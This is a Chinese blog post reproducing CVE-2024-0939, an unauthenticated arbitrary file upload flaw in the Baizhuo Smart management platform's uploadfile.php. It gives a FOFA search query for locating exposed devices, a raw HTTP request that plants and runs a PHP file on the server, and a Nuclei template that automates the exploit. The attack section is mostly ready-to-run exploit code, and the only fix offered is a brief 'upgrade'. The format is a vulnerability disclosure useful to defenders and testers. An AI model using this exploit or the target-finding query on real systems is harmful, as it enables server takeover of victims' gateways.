百卓Smart管理平台 uploadfile.php 文件上传漏洞(CVE-2024-0939)

最新推荐文章于 2024-05-21 22:01:35 发布
最新推荐文章于 2024-05-21 22:01:35 发布
阅读量1.2k 收藏 10
点赞数 14
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52204925/article/details/136085794
版权

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

百卓 Smart只管理平台是北京百卓网络技术有限公司(以下简称百卓网络)的一款安全网关产品,是一家致力于构建下一代安全互联网的高科技企业。

百卓Smart管理平台 uploadfle.php 接口存在任意文件上传漏洞。恶意攻击者可能利用此漏洞上传而恶意文件,从而导致服务器失陷。

影响版本

smart_s210

smart_s210_firmware

Ⅱ、fofa语句

title="Smart管理平台"

Ⅲ、漏洞复现

POC

POST /Tool/uploadfile.php? HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Upgrade-Insecure-Requests: 1
Connection: close
 
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="ceshi.php"
Content-Type: application/octet-stream
 
<?php echo md5('666');unlink(__FILE__);?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"
 
/home/ceshi.php
-----------------------------13979701222747646634037182887--

1、构建poc

2、访问

Ⅳ、Nuclei-POC

id: Baizhuo-Smart-upload

info:
  name: 百卓Smart管理平台 uploadfle.php 接口存在任意文件上传漏洞。恶意攻击者可能利用此漏洞上传而恶意文件,从而导致服务器失陷。
  author: WLF
  severity: high
  metadata: 
    fofa-query: title="Smart管理平台"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /Tool/uploadfile.php? HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
        Upgrade-Insecure-Requests: 1
        Connection: close
        
        -----------------------------13979701222747646634037182887
        Content-Disposition: form-data; name="file_upload"; filename="{{filename}}.php"
        Content-Type: application/octet-stream
        
        <?php echo md5('666');unlink(__FILE__);?>
        -----------------------------13979701222747646634037182887
        Content-Disposition: form-data; name="txt_path"
        
        /home/{{filename}}.php
        -----------------------------13979701222747646634037182887--

      - |
        GET /home/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"fae0b27c451c728867a567e8c1bb4e53")

Ⅴ、修复建议

升级至安全版本

Love Seed
关注
  • 14
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
百卓Smart管理平台 uploadfile.php 文件上传漏洞复现(CVE-2024-0939)
0xSec
02-07 960
百卓Smart管理平台 uploadfile.php 接口存在任意文件上传漏洞。未经身份验证的攻击者可以利用此漏洞上传恶意后门文件,执行任意指令,从而获得服务器权限并操纵服务器文件。
UploadFile.class.php支持多文件上传的上传类
03-31
UploadFile.class.php支持多文件上传的上传类 说明:支持多文件上传的上传类 使用方法: include '../UploadFile.class.php'; $upload=new UploadFile(); if(!$upload->upload()) { // 上传错误提示错误信息 $...
CVE-2021-21972
03-04
CVE-2021-21972(检查器) VMware vCenter Server CVE-2021-21972远程执行代码漏洞 该脚本根据POST请求中的以下PATH“ / ui / vropspluginui / rest / services / uploadova”,查找CVE-2021-21972的存在,并在响应正文(500)中查找单词“ uploadFile”,表示vCenter可通过POST接受文件而没有任何限制 手动检查: # curl -i -s -k -X $'GET' -H $'Host: <target>' -H $'User-Agent: alex666' $'https://<target>/ui/vropspluginui/rest/services/getstatus' # curl -i -s -k -X $'GET' -H $'Host: <targ
commons-fileupload用户指南(文档翻译)
Bruce --- java on the fly
03-16 1948
使用fileupload根据你的应用需求,fileupload可以有许多不同的使用方式。在最简单的情况下,你可以调用一个简单的方法来解析servlet请求,然后在他们提交到你的应用时处理表单列表。在其它规模的终端上,你也可能决定将fileupload进行自定义,以完全控制个别表单项存储的方法。比如,你或许会将内容流化来保存到数据中。在这里。我们将要描述fileupload的基本使用方法,然后解释一
(php)泛微E-Office文件上传漏洞(原理分析+复现+批量检测)
叶子的Blog
12-03 6481
漏洞描述 泛微e-office是泛微旗下的一款标准协同移动办公平台。 CNVD-2021-49104 由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行。 该漏洞CVSS评分:9.0,危害等级:高危 FOFA 查询 app="泛微-EOffice" 影响范围 影响版本:泛微e-office V9.0 代码分析 出现问题的代码在/general/index/UploadFile.php文件中,具体位置是 if ($u
eWebEditor在后台上传文件提示d_file.document.myform.uploadfile为空或不是对象
vbangle的专栏
04-24 438
经 BAIDU反复搜索和试验,认为由于服务器安装了反病毒或反木马工具,对ASP程序中的 server.createobject("abodb.stream")语句进行了屏蔽.由于这个语句无法直接执行,因此导致出现上述问题.(主要是屏 蔽了主目录下的Upload.asp,另外include/upload_class.asp中也有几处.upload.asp中的一处最为重要)。Set Ads = Server.CreateObject("Adodb." & "Stream")就OK了。去掉这一行后一切恢复正常!
d_file.myform.uploadfile为空或不是对象解决方法汇总
生活在继续
12-10 1582
首先声明一点,不要相信网上的所有答案,以下的未必能解决:1、打开服务器上的"Internet 信息服务(IIS)管理器",“默认网站”下找到“neiwang”,然后在其上点右键,选择"主目录"选项卡,然后单击"配置(G)",然后点“选项”,勾上"启用父路径(P)"的复选框,确定。2、原因:这个主要是有些杀毒软件会把上传组建当成病毒删除掉。 服务器里的杀毒软件屏蔽了上传文件的语句导致的,
百卓Smart管理平台 file/upload接口文件上传漏洞-0day未公开漏洞
weixin_43167326的博客
02-08 324
百卓 Smart管理平台是北京百卓网络技术有限公司(以下简称百卓网络)的一款安全网关产品,是一家致力于构建下一代安全互联网的高科技企业。
百卓Smart管理平台 uploadfile.php 文件上传漏洞CVE-2024-0939
holyxp的博客
02-07 1166
百卓 Smart管理平台是北京百卓网络技术有限公司(以下简称百卓网络)的一款安全网关产品,是一家致力于构建下一代安全互联网的高科技企业。百卓Smart管理平台 uploadfle.php 接口存在任意文件上传漏洞。未经身份验证的攻击者可以利用此漏洞上传恶意后门文件,执行任意指令,从而获得服务器权限并操纵服务器文件。
泛微 E-Office 任意文件上传漏洞 CVE-2023-2648(漏洞复现)
LHBD_R的博客
06-21 2714
漏洞介绍:泛微 E-Office 9.5版本中文件上传处理程序接口uploadify.php参数Filedata的操作导致任意文件上传,攻击者可以通过远程控制接口上传恶意文件
你不知道的文件上传漏洞php代码分析
12-18
漏洞描述 开发中文件上传功能很常见,作为开发者,在完成功能的基础上我们一般也要做好安全防护。 文件处理一般包含两项功能,用户上传和展示文件,如上传头像。 文件上传攻击示例 upload.php <?php $uploaddir...
文件和图片上传PHP类.zip
07-11
<?php  */ class UploadFile{ ... // 缩略图最大高度图片上传在我们在项目中经常用到,几乎没有任何一个项目可以脱离图片或者是文件上传。这次给大家带来的就是一个好用的文件和图片上传PHP
jsp+javabean_uploadfile.rar_java uploadfile_jsp uploadfi_jsp 文件上
09-23
实现jsp+javabean多文件上传代码
.faust勒索病毒解密方法|勒索病毒解决|勒索病毒恢复|数据库修复
最新发布
huifu91的博客
05-21 905
这些勒索病毒往往攻击入侵的目标基本是Windows系统的服务器,包括一些市面上常见的业务应用软件,例如:金蝶软件数据库,用友软件数据库,管家婆软件数据库,速达软件数据库,科脉软件数据库,海典软件数据库,思迅软件数据库,OA软件数据库,ERP软件数据库,自建网站的数据库等,均是其攻击加密的常见目标文件,所以有以上这些业务应用软件的服务器更应该注意做好服务器安全加固及数据备份工作。经过对病毒样本的深入分析和对XX公司网络环境的全面检查,91数据恢复公司的专家们很快找到了病毒的入侵路径和加密机制。
软考高级架构师:软件系统安全相关概念完整性、不可否认性、可控性、机密性、安全审计
明明如月的技术博客
05-19 248
了解软件系统安全的几个重要概念:完整性、不可否认性、可控性、机密性和安全审计,可以通过一些日常生活中的例子来帮助理解。
保障餐饮场所安全:可燃气体报警器专业检测的必要性
BDjiance的博客
05-21 161
可燃气体报警器是一种用于监测空气中可燃气体浓度的设备,一旦检测到可燃气体浓度超过设定的安全范围,就会发出警报,提醒人们及时采取措施,避免火灾事故的发生。在日常经营中,餐饮场所也应当加强对可燃气体报警器的日常维护和保养,定期清洁和检查,确保其在平时的使用中处于良好的状态。其次,定期检测也可以校准报警器的灵敏度,确保其能够及时、准确地检测到可燃气体的泄漏情况,提供更可靠的安全保障。综上所述,餐饮场所应当认真对待可燃气体报警器的专业检测周期,选择正规的专业机构进行检测和校准,保障其安全可靠。
[图解]SysML和EA建模住宅安全系统-05
rolt的专栏
05-18 738
作用就是定义属性之间的数学关系
HLS视频加密,让您的视频内容更安全
云存储小天使的博客
05-21 717
HLS视频加密是一种基于HTTP Live Streaming(HLS)协议的加密技术。它的核心思想是将视频切片进行加密处理,在客户端播放时需要先获取解密密钥才能正常偶发。通过这种方式,HLS加密可以有效防止未经授权的第三方窃取视频内容,从而保障了视频内容的版权和安全。数据万象媒体处理服务提供了一套HLS视频加密方案,方便用户各个场景的需求。
uni-app uni.uploadFile上传多文件前后端java代码
04-26
首先,您可以查阅uni-app和uni.uploadFile的官方文档,以深入了解如何使用这个功能上传多个文件。对于后端Java代码,请在服务器端参考Java Servlet规范和Java EE规范。您也可以查找一些示例代码和教程,了解如何在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值